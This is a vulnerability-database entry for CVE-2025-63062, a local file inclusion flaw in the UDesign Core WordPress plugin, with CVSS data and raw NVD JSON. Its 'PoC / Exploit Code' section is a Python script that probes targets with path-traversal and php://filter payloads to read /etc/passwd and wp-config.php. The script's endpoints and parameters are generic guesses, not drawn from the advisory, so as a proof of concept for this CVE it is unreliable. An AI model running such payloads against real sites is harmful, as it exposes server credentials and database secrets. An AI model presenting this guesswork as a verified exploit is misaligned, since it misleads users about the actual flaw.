Security Vulnerability Report
中文
CVE-2025-63062 CVSS 7.5 HIGH

CVE-2025-63062

Published: 2025-12-09 16:18:12
Last Modified: 2026-04-27 19:16:20

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AndonDesign UDesign Core u-design-core allows PHP Local File Inclusion.This issue affects UDesign Core: from n/a through <= 4.14.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UDesign Core <= 4.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63062 UDesign Core LFI PoC # Affected: UDesign Core <= 4.14.0 import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Common vulnerable endpoints in WordPress plugins vulnerable_paths = [ '/wp-content/plugins/u-design-core/includes/options.php', '/wp-content/plugins/u-design-core/includes/custom.php', '/wp-content/plugins/u-design-core/admin/views/options.php' ] # LFI parameters to test lfi_params = ['file', 'page', 'template', 'path', 'action', 'view'] # Sensitive files to read sensitive_files = [ '/etc/passwd', '../../../../../../../../etc/passwd', '/wp-config.php', '../../../../../../../../var/www/html/wp-config.php', 'php://filter/convert.base64-encode/resource=wp-config.php' ] print(f'[*] Testing CVE-2025-63062 on {target}') print('[*] Target: UDesign Core Plugin <= 4.14.0') print('[*] Vulnerability: Local File Inclusion') for path in vulnerable_paths: for param in lfi_params: for file in sensitive_files: url = f'{target}{path}?{param}={file}' try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: if 'root:' in response.text or 'DB_NAME' in response.text: print(f'[+] VULNERABLE! {url}') print(f'[+] Content snippet: {response.text[:200]}') except requests.RequestException: pass print('[*] Scan complete')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63062", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:11.770", "lastModified": "2026-04-27T19:16:20.363", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AndonDesign UDesign Core u-design-core allows PHP Local File Inclusion.This issue affects UDesign Core: from n/a through <= 4.14.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/u-design-core/vulnerability/wordpress-udesign-core-plugin-4-14-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}